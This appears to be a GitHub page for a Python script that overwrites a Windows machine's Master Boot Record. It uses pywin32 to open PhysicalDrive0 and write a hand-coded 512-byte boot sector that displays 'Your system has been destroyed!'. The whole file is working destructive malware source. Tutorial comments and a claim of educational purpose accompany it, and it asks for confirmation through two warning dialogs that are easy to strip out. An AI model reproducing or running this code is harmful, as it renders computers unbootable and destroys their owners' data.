-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathmbr_overwriter.py
More file actions
96 lines (83 loc) · 6.15 KB
/
mbr_overwriter.py
File metadata and controls
96 lines (83 loc) · 6.15 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
# Overwriting the Master Boot Record with custom text in Python!
# There is a very small change in the Python part, where we change AllocateReaderBuffer(512) to bytes([ HEX DATA ]).
# However, we will need to implement a boot loader in order to display text.
# Notice that this might not work for GPT systems, such as VMware.
# To start, we will need to import libraries that can interact with the Windows API from Python.
# A common choice for this is pywin32.
from win32file import * # Features CreateFileW, a function that will be used
from win32api import * # CloseHandle, Sleep etc.
from win32gui import * # GDI functions, unused, however always great to import
from win32con import * # Constants like GENERIC_READ etc
from win32ui import * # Object oriented Windows API objects.
import sys # Used to exit the current process. We might use ExitProcess(0), however this is more pythonic.
# Let's start by displaying a warning. We can do this by using the MessageBox function.
title = "! Warning !"
description = "You are about to execute a severly dangerous program that overwrites the Master Boot Record " \
"of your computer. This will cause irrepairable destructive consequences, and the creator is " \
"not responsible for any damage due to this being made for educational and illustrational purposes " \
"only!\n\nPress \"Yes\" to continue.\nPress \"No\" to exit."
# Display our warning.
# The parameters are description, title, icons and buttons.
# The icons and buttons may be customized however you like, eg. you can change MB_ICONWARNING
# to MB_ICONASTERISK or MB_ICONERROR for other icons. Keep in mind that if you change MB_YESNO
# to eg. MB_OKCANCEL the return value will differ.
if MessageBox(description, title, MB_ICONWARNING | MB_YESNO) == IDNO:
print("No pressed")
sys.exit(0)
# Let's make another warning for additional security.
title = "!! LAST WARNING !!"
description = "This is the last warning! Pressing \"Yes\" will destroy your computer, for a very long time!\n" \
"Are you sure you want to continue, resulting in an unbootable machine?!"
if MessageBox(description, title, MB_ICONWARNING | MB_YESNO) == IDNO:
print("Second no pressed")
sys.exit(0)
print("MBR overwriting...")
# Now let's begin the overwriting!
# First we will need to create a handle to the boot sector. This is the reason why we're using CreateFileW.
# Create a handle to the Master Boot Record!
# We will be using GENERIC_WRITE in order to gain write permissions, and FILE_SHARE_READ | FILE_SHARE_WRITE
# to allow other applications to use the Master Boot Record while we are using it.
hDevice = CreateFileW(r"\\.\PhysicalDrive0", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, None, OPEN_EXISTING,
0, 0)
# So now, how do we make a bootable program? We will need to go very low level, into assembly.
# Our boot sector data
buffer = bytes([
# paste the boot sector data here
0xE8, 0x15, 0x00, 0xBB, 0x27, 0x7C, 0x8A, 0x07, 0x3C, 0x00, 0x74, 0x0B, 0xE8, 0x03, 0x00, 0x43,
0xEB, 0xF4, 0xB4, 0x0E, 0xCD, 0x10, 0xC3, 0xC3, 0xB4, 0x07, 0xB0, 0x00, 0xB7, 0x04, 0xB9, 0x00,
0x00, 0xBA, 0x4F, 0x18, 0xCD, 0x10, 0xC3, 0x59, 0x6F, 0x75, 0x72, 0x20, 0x73, 0x79, 0x73, 0x74,
0x65, 0x6D, 0x20, 0x68, 0x61, 0x73, 0x20, 0x62, 0x65, 0x65, 0x6E, 0x20, 0x64, 0x65, 0x73, 0x74,
0x72, 0x6F, 0x79, 0x65, 0x64, 0x21, 0x0D, 0x0A, 0x4C, 0x69, 0x6B, 0x65, 0x20, 0x26, 0x20, 0x53,
0x75, 0x62, 0x73, 0x63, 0x72, 0x69, 0x62, 0x65, 0x21, 0x0D, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
])
# Overwrite the Master Boot Record!
bytes_written = WriteFile(hDevice, buffer, None)
print("Wrote", bytes_written, "bytes to the Master Boot Record successfully!")
# Release the memory allocated to the handle
CloseHandle(hDevice)